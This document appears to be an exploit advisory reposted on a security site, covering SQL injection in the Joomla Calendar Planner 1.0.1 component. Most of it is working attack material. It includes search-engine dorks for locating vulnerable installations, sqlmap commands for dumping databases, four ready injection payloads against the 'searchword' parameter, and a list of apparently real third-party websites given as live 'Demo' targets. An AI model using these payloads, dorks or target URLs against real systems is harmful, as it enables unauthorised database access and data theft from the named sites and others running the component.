Joomla Component Calendar Planner 1.0.1 - SQL Injection

2017.08.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

-- Date: 20/08/2017 -- Vendor: Homepage: http://joomlathat.com/ -- W10 -- Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/calendar-planner/ -- Version: 1.0.1 -- Category: Webapps -- Dorks: === Dork1: "inurl:option=com_calendarplanner" === Dork2: "inurl:/index.php/component/calendarplanner/events?searchword=&option=com_calendaprlanner&view=events&category_id=" === Dork3: "inurl:events?searchword=&option=com_calendarplanner&view=events&category_id=" -- Creditos: Informacion - Anonymous -- Autor: Ihsan Sencan -- Web: http://ihsan.net/ -- DumpDb: Remove: "&date_in=2017-04-17&date_out=&access_select=1&multiselect=1&option=com_calendarplanner&view=events&category_id=0" Add: 0' Menssage: Alert: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '') ORDER BY ev.date_start ASC , ev.hour_start ASC' at line 1 --- Erase : sqlmap -u https://site/es/component/calendarplanner/events?searchword= --------> &date_in=2017-04-17&date_out=&access_select=1&multiselect=1&option=com_calendarplanner&view=events&category_id=0 <---------- --- sqlmap -u https://www.site.com/es/component/calendarplanner/events?searchword= --dbs -- Demo: - http://www.dipartimentodesign.polimi.it/agenda/events?searchword=&date_in=2017-01-02&date_out=&option=com_calendarplanner&view=events&category_id=0 - http://www.aumaujaya.org/index.php/2013-02-24-18-14-58/events/events?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0' - http://www.cadam-solutions.ch/2017/index.php/component/calendarplanner/events?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0' - http://www.akdh-ev.de/ausstellungen/ausstellungstermine.html?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0' - http://www.akdh-ev.de/ausstellungen/ausstellungstermine.html?searchword=&date_in=2017-05-18&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0' - https://www.serenacentral.com/community/events/events?searchword=&date_in=2017-07-28&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0' - http://www.dipartimentodesign.polimi.it/agenda/events?searchword=&date_in=2017-03-30&date_out=&option=com_calendarplanner&view=events&category_id=0' --P0Ff: ============================================ ==Parameter: searchword (GET) ====== Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: searchword=") AND 6499=6499# ====== Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: searchword=") OR (SELECT 7934 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7934=7934,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("jqvr"="jqvr ====== Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: searchword=") OR SLEEP(5) AND ("mmOk"="mmOk ====== Type: UNION query Title: MySQL UNION query (NULL) - 29 columns Payload: searchword=") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717071,0x796145654d6e6f6f436e41637678434f74496f765a626a666c645461484d63747648525a56565175,0x7170627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# =============================================================

References:

https://www.facebook.com/Informacion-Anonymous-611394289006994/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top